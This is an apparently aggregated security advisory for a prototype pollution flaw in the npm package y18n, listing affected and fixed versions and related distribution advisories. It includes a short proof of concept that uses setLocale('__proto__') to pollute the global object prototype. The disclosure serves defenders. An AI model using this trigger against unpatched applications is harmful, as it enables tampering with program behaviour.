[NPM:GHSA-C4W7-XM78-47VH] Prototype Pollution in y18n
Severity
High
Affected Packages
3
Fixed Packages
3
CVEs
1
Overview
The npm package y18n
before versions 3.2.2, 4.0.1, and 5.0.5 is vulnerable to Prototype Pollution.
POC
```js
const y18n = require('y18n')();
y18n.setLocale('__proto__');
y18n.updateLocale({polluted: true});
console.log(polluted); // true
```
Recommendation
Upgrade to version 3.2.2, 4.0.1, 5.0.5 or later.
Package | Affected Version |
---|---|
pkg:npm/y18n | >= 5.0.0, < 5.0.5 |
pkg:npm/y18n | = 4.0.0 |
pkg:npm/y18n | < 3.2.2 |
Package | Fixed Version |
---|---|
pkg:npm/y18n | = 5.0.5 |
pkg:npm/y18n | = 4.0.1 |
pkg:npm/y18n | = 3.2.2 |
- ID
- NPM:GHSA-C4W7-XM78-47VH
- Severity
- high
- URL
- https://github.com/advisories/GHSA-c4w7-xm78-47vh
- Published
-
2021-03-29T16:05:12
(3 years ago) - Modified
-
2023-11-29T22:45:30
(9 months ago) - Rights
- NPM Security Team
- Other Advisories
-
- ALPINE:CVE-2020-7774
- ALSA-2020:5499
- ALSA-2021:0548
- ALSA-2021:0551
- ELSA-2020-5499
- ELSA-2021-0548
- ELSA-2021-0551
- FREEBSD:C0C1834C-9761-11EB-ACFD-0022489AD614
- GLSA-202405-29
- openSUSE-SU-2021:1059-1
- openSUSE-SU-2021:1060-1
- openSUSE-SU-2021:1061-1
- openSUSE-SU-2021:1113-1
- openSUSE-SU-2021:2327-1
- openSUSE-SU-2021:2353-1
- openSUSE-SU-2021:2354-1
- openSUSE-SU-2021:2618-1
- RHSA-2020:5499
- RHSA-2021:0548
- RHSA-2021:0551
- RLSA-2020:5499
- RLSA-2021:0548
- RLSA-2021:0551
- SUSE-SU-2021:2319-1
- SUSE-SU-2021:2323-1
- SUSE-SU-2021:2326-1
- SUSE-SU-2021:2327-1
- SUSE-SU-2021:2353-1
- SUSE-SU-2021:2354-1
- SUSE-SU-2021:2618-1
- SUSE-SU-2021:2620-1
Type | Package URL | Namespace | Name / Product | Version | Distribution / Platform | Arch | Patch / Fix |
---|---|---|---|---|---|---|---|
Affected | pkg:npm/y18n | y18n | >= 5.0.0 < 5.0.5 | ||||
Fixed | pkg:npm/y18n | y18n | = 5.0.5 | ||||
Affected | pkg:npm/y18n | y18n | = 4.0.0 | ||||
Fixed | pkg:npm/y18n | y18n | = 4.0.1 | ||||
Affected | pkg:npm/y18n | y18n | < 3.2.2 | ||||
Fixed | pkg:npm/y18n | y18n | = 3.2.2 |
# CVE | Description | CVSS | EPSS | EPSS Trend (30 days) | Affected Products | Weaknesses | Security Advisories | Exploits | PoC | Pubblication Date | Modification Date |
---|---|---|---|---|---|---|---|---|---|---|---|
# CVE | Description | CVSS | EPSS | EPSS Trend (30 days) | Affected Products | Weaknesses | Security Advisories | PoC | Pubblication Date | Modification Date |